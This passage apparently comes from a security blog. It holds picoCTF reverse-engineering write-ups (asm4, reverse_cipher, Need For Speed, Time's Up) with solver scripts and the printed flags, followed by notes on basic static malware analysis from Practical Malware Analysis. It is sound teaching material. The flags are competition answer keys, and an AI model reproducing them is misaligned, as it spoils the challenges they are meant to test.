| old ebp | <-- ebp
+----------------+
| | <-- ebp - 0x4
+----------------+
| 0x1 | <-- ebp - 0x8
+----------------+
| 0xd | <-- ebp - 0xc
+----------------+
| 0x247 | <-- ebp - 0x10
+----------------+

<+138>: mov eax,DWORD PTR [ebp-0xc] ; eax = var1
<+141>: sub eax,0x1 ; eax -= 1
<+144>: cmp DWORD PTR [ebp-0x8],eax if var3 < eax
<+147>: jl 0x530 <asm4+51> jump 51

In this code block, we load var1 into EAX and decrement by 1 and compare it to var3 which is currently 1. If var3 is less than EAX we take a jump. Since during this first loop EAX contains 0xC and var3 contains 1 it is less so we do take the jump.

<+51>: mov edx,DWORD PTR [ebp-0x8] ; edx = var3
<+54>: mov eax,DWORD PTR [ebp+0x8] ; eax = arg1
<+57>: add eax,edx ; eax = eax[edx]
<+59>: movzx eax,BYTE PTR [eax]
<+62>: movsx edx,al ; edx = eax

Here we load EDX with var3, currently 1, and EAX with arg1, the character array. Then we get the character located at the index of var3. So for this first iteration, we grab the character at index 1, so i, and load it into EDX.

<+65>: mov eax,DWORD PTR [ebp-0x8] ; eax = var3
<+68>: lea ecx,[eax-0x1] ; ecx = eax - 1
<+71>: mov eax,DWORD PTR [ebp+0x8] ; eax = arg1
<+74>: add eax,ecx ; eax[ecx]
<+76>: movzx eax,BYTE PTR [eax]
<+79>: movsx eax,al
<+82>: sub edx,eax ; edx -= eax
<+84>: mov eax,edx ; eax = edx
<+86>: mov edx,eax ; edx = eax

Here we load EAX with var3 and then load ECX with EAX - 1. We then grab the index of the character array specified by ECX, which is currently 0.

So as of right now, EAX contains p and EDX contains i. After loading EAX with the sign-extended version of AL, we subtract EDX with EAX. So we subtract p with i and load it into EDX. In other words we calculate arg1[i] - arg1[i-1]. For this first iteration EDX contains 0xFFF9.

<+88>: mov eax,DWORD PTR [ebp-0x10] ; eax = var1
<+91>: lea ebx,[edx+eax*1] ; ebx = edx + eax * 1
<+94>: mov eax,DWORD PTR [ebp-0x8] ; eax = var2
<+97>: lea edx,[eax+0x1] ; edx = eax + 1
<+100>: mov eax,DWORD PTR [ebp+0x8] ; eax = arg1
<+103>: add eax,edx ; eax = eax[edx]
<+105>: movzx eax,BYTE PTR [eax]
<+108>: movsx edx,al ; edx = al

Now we load EAX with var1, 0x247, and calculate EDX + EAX * 1; 0xFFF9 + 0x247 * 1; so EBX will contain 0x240. Then we load EAX with var3, which is currently 1. Then we load EDX with EAX + 1, which during this first iteration is 0x1 + 1 = 0x2. Then we get the character at index EAX + 1 or index 2 for the first loop; so EDX will be c.

<+111>: mov ecx,DWORD PTR [ebp-0x8] ; ecx = var2
<+114>: mov eax,DWORD PTR [ebp+0x8] ; eax = arg1
<+117>: add eax,ecx ; eax = eax[ecx]
<+119>: movzx eax,BYTE PTR [eax]
<+122>: movsx eax,al
<+125>: sub edx,eax ; edx -= eax
<+127>: mov eax,edx ; eax = edx
<+129>: add eax,ebx ; eax += edx

In this block, we grab arg1[var2] which in the first iteration is i since var2 is 1. Then we once again subtract two characters from each other. This time we calculate arg1[i+1] - arg1[i] and load it into EDX. Then we add the result to EBX which contains 0x240 from earlier and set that into EAX.

<+131>: mov DWORD PTR [ebp-0x10],eax
<+134>: add DWORD PTR [ebp-0x8],0x1
<+138>: mov eax,DWORD PTR [ebp-0xc]
<+141>: sub eax,0x1
<+144>: cmp DWORD PTR [ebp-0x8],eax
<+147>: jl 0x530 <asm4+51>

We then load var1 with the contents of EAX. We also increment var3 by 1 and decrement var2 by 1 and check to see if var3 is less than var2. If it is still we loop again.

So after this first iteration of the loop our stack will look like this:

+----------------+
| picoCTF_c1373 | <-- ebp + 0x8
+----------------+
| ret | <-- ebp + 0x4
+----------------+
| old ebp | <-- ebp
+----------------+
| | <-- ebp - 0x4
+----------------+
| 0x2 | <-- ebp - 0x8
+----------------+
| 0xd | <-- ebp - 0xc
+----------------+
| 0x23a | <-- ebp - 0x10
+----------------+

We can port the algorithm that this assembly does to Python with the below code snippet. Running the code snippet will give us 0x1DE; which if we submit to the pico site we get a success.

arg1 = "picoCTF_c1373"
strlen = len(arg1)
seed = 0x247

x = 1
while x < strlen - 1:
 var1 = ord(arg1[x]) - ord(arg1[x-1])
 aux = var1 + seed * 1
 var2 = ord(arg1[x+1]) - ord(arg1[x])
 var2 += aux
 seed = var2
 x += 1
print(hex(seed))

reverse_cipher

Problem

We have recovered a binary and a text file. Can you reverse the flag. Its also found in /problems/reverse-cipher_1_2df63c1ee06e5ed37e35622b009f92ff on the shell server.

Hint: objdump and Gihdra are some tools that could assist with this

Solution

Loading rev into IDA we can start to reverse engineer this binary. IDA should automatically dump you into main for this binary, note it will not always be that way. For the first code blocks that IDA generates we see that the binary tries to load two files flag.txt and rev_this. If they cannot be opened error messages are printed to the screen.

Otherwise, we will use the file pointer to the flag.txt file to read 1 element of 24 bytes from the file. The total number of elements read is stored into EBP-0x24 and compared with 0. If zero bytes were read the program exits; otherwise the characters read are stored in EBP-0x50. We then set a loop counter up and enter a loop that checks to see if the counter is less than or equal to 7. Each iteration of the loop places a character from flag.txt into rev_this; since we run this 8 times this will place picoCTF{ into rev_this.

After the loop, we change the loop variable from 7 to 8 and move on.

In the next loop, we check and see if the loop variable is less than or equal to 0x16. Inside the loop, we load the current character of the array into a local variable. Then we check and see if the loop counter is even or odd. If it is odd we subtract 2 from the current character, otherwise, we add 5 to it. Then we place this modified character into rev_this. After we do this 15 times we leave the loop, place the last character of flag.txt into rev_this and cleanup.

To decode this we will need to perform the opposite of the operations that we performed on each value. Therefore, odd values will need to have 2 added to each character and evens 5 subtracted from each character.

for counter, x in enumerate("w1{1wq8b5.:/f.<"):
 if not counter % 2:
 print(chr(ord(x) - 5), end='')
 else:
 print(chr(ord(x) + 2), end='')

Running the above script we get r3v3rs3d0051a07. Therefore, our flag is picoCTF{r3v3rs3d0051a07}.

Need For Speed

Problem

The name of the game is speed. Are you quick enough to solve this problem and keep it above 50 mph? need-for-speed.

Solution

If we run this program straight out of the box it will tell us we are not fast enough.

Let’s open this binary open in IDA and see what is going on.

The main method is not too interesting as all the functionality has been refactored into functions that are called. Let’s first check out header.

In header we see that it prints off the message Keep this thing over 50 mph! plus a loop that prints off multiple =s. After the loop is done we print a newline character.

The function that is called after header is set_timer. In this function, we call __sysv_signal with a signal of 0xE meaning SIGALRM and a handler of alarm_handler. __sysv_signal handles signals triggered by the operating system. In this case, we are setting up a handling routing for SIGALRM. If the __sysv_signal function works properly we call alarm with 1 second for a timer.

When the 1-second timer goes off alarm triggers a SIGALRM which is handled by alarm_handler; which simply prints Not fast enough. BOOM! and exits the program.

After we exit this function we move on to get_key; which first prints that the key is being created and then move to calculate_key.

This function starts a loop an 0xD8C2071C and counts down to 0xEC61038E. Once at that value we return 0xEC61038E as the key. This is where the program is failing to pass, as when we ran the program initially it prints Creating key... but not Finished. Since our alarm only gives us 1 second to complete the program after it is set this loop is slowing us down enough to not allow the program to complete.

We have a few ways to solve this.

1. Patch the original binary to change 0xD8C2071C to 0xEC61038F so it only takes one iteration of the loop block
2. Change the alarms parameter to be greater than 1 second.
3. Run the program in a wrapper that suppresses signals such as GDB.

The third solution is the easiest but not the most engaging, however, we have more challenges ahead of us so we will just do that.

Running the program with gdb we get this output; with our flag being picoCTF{Good job keeping bus #236cb1c9 speeding along!}

Time’s Up

Problem

Time waits for no one. Can you solve this before time runs out? times-up, located in the directory at /problems/time-s-up_5_44ffbb55dd7707c9e13da8551841f850.

Solution

If you run the program it will print out an equation that it wants you to solve. This binary is similar to the one before in the sense that they are both timed. Unfortunately, the amount of time required to solve the equation by hand is way more than the time allotted. To solve this we can use a script that uses pwntools a popular exploit development library.

from pwn import *

p = process('./times-up')
formula = p.recvline().split(':')[1].strip()
p.recvline()
print(formula)
exec('a=' + formula)
p.sendline(str(a))
p.interactive()

This solution will need to be run on the pico server as it reads flag.txt. Running this on the pico server we get picoCTF{Gotta go fast. Gotta go FAST. #3c4b5166}.

NOTE: PMA is focused on Windows executables. Due to that many of the concepts are on Window API concepts, however most of the high level ideas can be applied for any operating system.

Chapter one of PMA is focused on basic static analysis of binary files. For binary analysis there are two forms of analysis static and dynamic; each have a basic and advanced form. Basic static analysis is analysis that only looks at the metadata that can be retrieved from an executable. Files are NOT run during this step! Nor are they disassembled.

Scanning and Hashing

A good first step in malware analysis is to see if the file you are analyzing has been seen before. This step can be done before looking at any metadata stored within an executable. Looking online to see if a malware that you have already has been analyzed can be extremely helpful. Virus Total is a fantastic website that allows users to upload samples of files that they believe to be malicious. However, be aware that posting malware samples online during an investigation can be counterproductive. If the malware author becomes aware that someone is trying to analyze their malware they may try to change tactics…

Hashing is a common method to uniquely identify files and in particular malware. A good hashing algorithm is a 1 -> 1 function, that is, when data is sent into a hashing algorithm the output is unique to only that input data. For example, if I were send a file into SHA1 its output should always be the same for that file, and no other file should be able to reproduce the output of my file, unless they are the same files.

$ echo "hello" | shasum
f572d396fae9206628714fb2ce00f72e94f2258f  -

$ echo "Hello" | shasum
1d229271928d3f9e2bb0375bd6ce5db6c6d348d9  -

Strings

Searching through strings, a sequence of characters, in a program is a easy way to get hints about a programs purpose. For example, if you searched through the strings of a program and found a bunch of IP addresses and domain names one may assume the program has some sort of networking functionality. If you were to find verbs like “sleep”, “execute”, “download” you may assume that the program takes commands from a server.

The strings utility can be used to find both ASCII and UNICODE strings found inside a program. However, it is not installed by default on Windows.

NOTE: By default strings, on Windows, ignores “strings” less than 3 characters.

An alternative tool to strings is FLOSS. FLOSS is made by FireEye Labs Advanced Reverse Engineering or FLARE. Other than just pulling basic strings out of a binary it attempts to find obfuscated strings using advanced static analysis. FLOSS, by default, is much slower than strings as it attempts to find obfuscated strings. However, there is a flag you can provide to not run any de-obfuscation.

Packed Binaries

Malware writers want their malware to succeed; to do that they need to write malware that is difficult to analyze. Therefore, it is common to see malware that is packed or obfuscated in some way.

Obfuscated programs are programs that have had their internals manipulated in a way to deter or confused malware analysts. Like movfuscator, one of the most horrendous obfuscators out there…

Packing malware is a way to compress a program and can be considered a subset of obfuscation. Malware that has been packed use a small wrapper program to decompress the packed file. Therefore when looking at a packed file, most of the time you are looking at the unpacker not the actual malware.

PEiD is a fantastic tool to detect packed files. Unfortunately, PEiD is no longer supported. Therefore, many newer packed malware will not be detected by it.

A quick way to see if a malware is packed is to look at the sections in the PE file. If the normal PE sections are not there and have been replaced that is a good indicator. For instance UPX, a common packer, will replace the sections with UPX01, UPX02, UPX03. Another way of determining if a file is packed is by looking at the sections Raw Size and Virtual Size. The raw size is a binary’s section’s size on the disk and the virtual size is the binary’s section’s size one loaded into memory. If a virtual size is much larger than the raw size it is a good indicator that the file is packed. Another indicator of a packed binary is if there are a small amount of readable strings when analyzing a binary.

Portable Executable Format

When programs are compiled on Windows they generate a portable executable (PE). PE files are used by executable, DLLs, and object code. If you are on a Linux based system you will get an executable and linking format file (ELF), on Mac you have Mach Object file formats (Mach-O).

Each section of the PE file contains information that is required for the Windows OS to correctly load and run the file. A few examples of important information that can be pulled from PE headers are:

• Compilation Date
• Imported Functions
• Exported Functions

Linked Libraries

Windows binaries have a few ways of linking libraries. One can statically link, dynamically link, and link at runtime.

Static linking takes all the code from the library and copies it into the executable. It is the least used as a programs size will quickly balloon. In statically linked files it is difficult to tell what functions were generated by the users and what were pulled from external libraries.

Dynamic linking is the most common, at least with non-malicious programs. With dynamic linking the operating system will search for the necessary libraries when the program is loaded. If the libraries cannot be found the program will not run. A downside to dynamic linking is that authors must ensure their users have the libraries that the program will use.

Runtime linking is very uncommon in normal programs, but is rather common for malicious ones. For runtime linking the program will request certain libraries when needed nad not at runtime like dynamic linking. It is similar to dynamic linking in the way that the entire libraries code base is not compiled into the program. However, with runtime an analyst can not see which function are being imported as easily with dynamic linking. There are flags that can show a program is using runtime linking. For runtime linking to work the program will need to use LoadLibrary and GetProcAddress.

PE File Headers and Sections

The PE format is quite expansive and will not be covered in detail here. However the most important sections in a PE File are the following: .text: Contains the instructions the CPU will execute.

.rdata: Read only data, usually contains the imports and exports. Will also contain strings and constants.

.data: Stores global data accessed by the program.

.rsrc: Stores resources needed by the executable.

There are a multitude of programs out there to parse PE files and pull out important information. PEView is an older tool. It’s very small and does not have as much bells as whistles as the other tools. CFF Explorer is another PE parser. One of its benefits is that it contains a dependency walker for all the imported functions used by the binary. The professional PE explorer (PPEE or puppy) is also a fantastic tool. It has all the benefits the CFF Explorer has but has support for plugins and tries to categorize the strings located in a binary.